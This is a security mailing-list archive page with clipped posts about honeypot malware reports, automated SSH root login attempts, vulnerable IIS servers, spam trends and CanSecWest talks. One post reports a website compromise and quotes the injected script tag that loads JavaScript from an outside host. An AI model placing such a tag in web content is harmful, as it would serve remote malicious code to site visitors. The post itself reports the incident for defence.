Hi list,

with my adsl + soekris + openbsd + honeypot + perl I made a simple pages
about "Malware IRC/DNS Network Activity".

http://www.nothink.org/malware/report/hash-a.html

These pages will be update automatically every day.
You can also download a "TOTAL CSV FILE" with these informations:

md5,

[ more ]  [ reply ]

Yeah, but I'm a masochist, I run these servers for the fun of it and to
see what's happening on the net. I see all of the background static and
every now and again I see somehting fun like this!

Gary Baribault
Courriel: gary (at) baribault (dot) net [email concealed]
GPG Key: 0x4346F013
GPG Fingerprint: BCE8 2E6B EB39 9B23 6

[ more ]  [ reply ]

I haven't had any luck getting the attack code either .. it's clearly
automated and I've had many replies saying that others have been hit the
same over the last 18 hours .. it's actually a rather stupid attack,
since it only tries root and only once..

Gary Baribault
Courriel: gary (at) baribault (dot) ne [email concealed]

[ more ]  [ reply ]

I'm hit all the time too, but it's usually scripted, and they'll try 6 -
8 logins before my DenyHosts script bans the IP address. In this case,
there is only one login attempt, and it with root .. then that source IP
doesn't try again .. it's as if someone just got some default password
or maybe

[ more ]  [ reply ]

I don't know what is going on last night and this morning ... I have
three Linux servers facing the Internet, two on cable modems and another
on a static IP/commercial connection and this last one is a gateway to a
Web/FTP/SMTP/Pop3/NTP Linux based system.

I have DenyHosts installed on all three

[ more ]  [ reply ]

Hi Glenn,

Looks like it can be any number of attack vectors.

Your infrastructures are highly vulnerable (NT and IIS 4) and may
contain lots of vulnerabilities you're not aware of. Moreover, your
custom developed CMS which is probably ASP based may have application
security vulnerabilities. Have yo

[ more ]  [ reply ]

On Sunday, 2008-April-13 at 01:07:38.030 UTC, the CMS database of the
U.S.-based NGO I work for mysteriously had a JavaScript URL appended to
the titles of much of the content on our website:

<script src=http://www.nihaorr1.com/1.js></script>

NB: the last modified dates for all of the content

[ more ]  [ reply ]

Greetings!

Not that I want to complain - but I have observed a massive drop in
(unsuccessful because blocked) SPAM deliveries - only ~10% compared to only
2 weeks ago (or only 20% of the average of this year).
http://www.wyae.de/mailstats.png

Has anyone else observed this?
What might be the r

[ more ]  [ reply ]

CanSecWest 2008 Presentations

Snort 3.0 - Marty Roesch, Sourcefire

Cross-Site Scripting Vulnerabilities in Flash Authoring Tools - Rich
Cannings, Google

Proprietary RFID Systems - Jan "starbug" Krissler and Karsten Nohl, CCC

Media Frenzy: Finding Bugs in Windows Media Software - Mark Dowd and

[ more ]  [ reply ]